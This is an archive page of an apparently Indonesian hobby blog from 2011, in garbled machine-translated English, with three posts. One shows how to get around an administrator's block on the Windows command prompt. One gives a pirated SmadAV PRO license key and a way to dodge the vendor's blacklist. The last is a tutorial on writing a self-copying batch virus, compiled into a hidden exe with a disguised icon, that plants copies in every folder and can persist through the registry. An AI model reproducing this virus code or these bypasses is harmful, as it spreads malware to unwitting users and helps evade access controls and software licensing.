Oktober 2011 ~ Angkringan Digital

Kamis, 27 Oktober 2011

open CMD on the block

how to open CMD on the block, namely:

The first way:

1. Open Microsoft Word

2. Type: file: / / / c: / ​​windows/system32/cmd.exe

3. Press space / enter, will form a link (blue)

4. press ctrl while clicking the link could open the CMD.

The second way:

Create a batch file in notepad whose contents:
@ echo off
@ echo on

Save with a bat extension (*. bat) with the file name up to you, then after tersave you can execute the file then can open CMD.

You ever play in the cafe or elsewhere trus CMD (Command Prompt) in the block by the admin?CMD is very annoying if true - right in the block, but the quiet guys, here's how to open a blocked CMD, this is how:
1. Open Microsoft Word
2. Type: file: / / / c: / ​​windows/system32/cmd.exe3. Press space / enter, will form a link (blue)
4.Tekan ctrl while clicking the link could open the CMD.

The second way:
Create a batch file in notepad whose contents:

@ echo off


@ echo OnSave with bat extension (*. bat) with the name of the file is up to you, then after save you can execute the file then can open CMD.

Third way:

Creating a shortcut. Ie right click on desktop => New => shortcuts. Well just give in the text box and enter cmd.exe writing and give the name up to you. Stay just click dech ... so good luck, hopefully helping!

Key SmadAV 7.8 PRO => 100% Anti-Blacklist (Update October 4, 2011)

Key SmadAV 7.8 PRO => 100% Anti-Blacklist (Update October 4, 2011)
For you who still have not managed to make Smadav Rev 8.7 PRO on your PC. Try to just follow the way below carefully and thoroughly. With screenshots are clear and easily understandable language well, hopefully followed by how easy you all and managed to make Smadav Rev 8.7 PRO on your PC. get on with it guys.

How to safely enter the key pro 8.7 smadav not in Blacklist :
1. Open Smadav Rev 8.6 PRO on your PC and click on Settings and click Unregister and then click OK (8.6 SmadAV So you become a FREE PRO). 

2. Then install Smadav Rev 8.7 on your PC, please download here SmadAV Rev. 8.7. 3. If you are finished click OK to install directly on your PC SmadAV replace with a newer SmadAV. 4. When SmadAV form is already open, click Settings, and then enter the code below into the registration field.
Name: MWSmadav Key: 995899520408 

5. Next click on Register and now Smadav 2011 Rev 8.7 on a PC or laptop you're already a PRO. 

How to enter the key smadav pro 8.7 if you're already on the Blacklist smadav : 

1. Uninstall Smadav Rev 8.7 from your PC, right click the icon in the system tray smadav then click Uninstall! then delete the folder in program files SmadAV if it still exists. 

2. Then Install SmadAV Rev. 8.6, for you who do not have the uninstall smadav please download here SmadAV 8.6 Rev. 8.6, if it is installed directly over an open SmadAV form.
3. Click Settings, and then type in "anti-piracy" in the column name (without the quotes) and click register (So that you may be missing signs SmadAV pirated).

4. Then Install SmadAV Rev. 8.7, please download here SmadAV Rev. 8.7.Jika direct install is complete click OK to replace SmadAV on your PC with a newer SmadAV.  
5. When SmadAV form is already open, click Settings, and then enter the code below into the registration field.
Name: MWSmadav Key: 995899520408
And now Smadav 2011 Rev 8.7 on a PC or laptop you're already a PRO.

The point is if SmadAV on your PC to the Blacklist, you have to install previous versions SmadAV and type in "anti-piracy" (without quotation marks) in the box in the column name registration and click Register so you're missing SmadAV pirated . New sign and install the latest SmadAV ago enter key above and then click the Register, is guaranteed to be SmadAV on your PC into PRO. If it still does not work well, my advice is do not give up until finally, follow a careful and thorough way that i have given above must be guaranteed Smadav Rev 8.7 PRO on your PC 100% Anti-Blacklist GOOD TRY.
If you want to make Key SmadAV PRO with your own name, please see here Keygen SmadAV PRO 2011.
NB: Make you want to copy and paste this article on the web / blog, do not forget to include links irchamstechno1993.blogspot.com okay. Be the Indonesian who knows his debts, thank you.

artikel by : http://www.modernw4r3.com/

Make Virus With CMD Command

 That need to be prepared:
1. Quick Batch File Compiler Software (quickbfc.exe) 2. License key or crack from quickbfc 3. Knowledge of command cmd 4. Icon Changer Software
www.abyssmedia.com quickbfc is software from which this software can be used to compile (or whatever his name aja) perintah2 cmd into exe files. One of the privileges quickbfc is its ability to make an exe file that is created when the run will not display the console window. This feature can be set by selecting Project => option => ghost application. It's just who can use this feature only full version (or it could be on crack).
Icon Changer (IC) is required to find the icon as the icon belongs windows. IC can be downloaded at http://www.shelllabs.com/. After opening the IC, the search icon in folder windows \ system32, there will be many interesting icons, such as a folder icon, icon text, etc.. Having met the desideratum icon save icon.
Now we discuss the problem cmdnya command. One characteristic of viruses is the ability to multiply. As we know if we create a bat file contents dg "copy% 0 c: \" then it will result in a bat file was dicopikan to c: \. But when we use the same command in quickbfc then the result is not like that, in the sense that exe file is generated when the run will not be in the copies to drive c: \. To get around this we can use another way is by the command "for%% a in (*. exe) do if%% ~ za EQU 12 345 copy%% ac: \ arira.exe".
This command means "for every exe file in this directory if the file size of 12,345 bytes of the file copikan (12,345 bytes last-sized) to c: \ dg arira.exe name". 12 345 is the file size of the compiled results quickbfc virus (for example). Imaginable problem is if there is an exe file size is the same and who are on the same folder with our virus file.
Ok, then make other orders. We can do something so that our virus on the run will open up my documents. The command "explorer% userprofile%". Terusss, this command can be a bit annoying for / R c: \%% d in (cinta.exe) do copy c: \ arira.exe "%% d", this command means "for every folder, subfolder on drive c copikan file c: \ arira.exe in your folder with the name cinta.exe ". then after the completion of this command is executed all the folders and subfolders in c: \ will have a file cinta.exe. And so on .... And so he ordered his own thinking ... .. for example make a value in regedit let the virus can live again after the computer restarts, etc..
Example: The command cmd we have made
REM This is the beginning of the script for%% a in (*. exe) do if%% ~ za EQU 12 345 copy "%% a" c: \ arira.exe Explorer% userprofile% for / R c: \%% d in (cinta.exe) do copy c: \ arira.exe "%% d" REM This is the end of the script
Before you select a custom compiled resources to set the icon of the file to be generated. Compile scripts above, then look at the size of the generated exe file. Suppose the resulting file size is 82,571, then replace the scripts above, so be
REM This is the beginning of the script for%% a in (*. exe) do if%% ~ za EQU 82 571 copy "%% a" c: \ arira.exe Explorer% userprofile% for / R c: \%% d in (cinta.exe) do copy c: \ arira.exe "%% d" REM This is the end of the script
Compile again, see the resulting file size. If size is 82,571 bytes then it is correct. If not, repeat until the number on the same scripts with the resulting file size.

Description: In the example above the command "for%% a in (*. exe) do if%% ~ za EQU 82 571 copy%% ac: \ arira.exe" can not be used for cmd (only for scripts), use this command if pingin change in eating cmd%% a with% a, so the command would be "for% a in (*. exe) do if% ~ za EQU 82,571 copies% ac: \ arira.exe"

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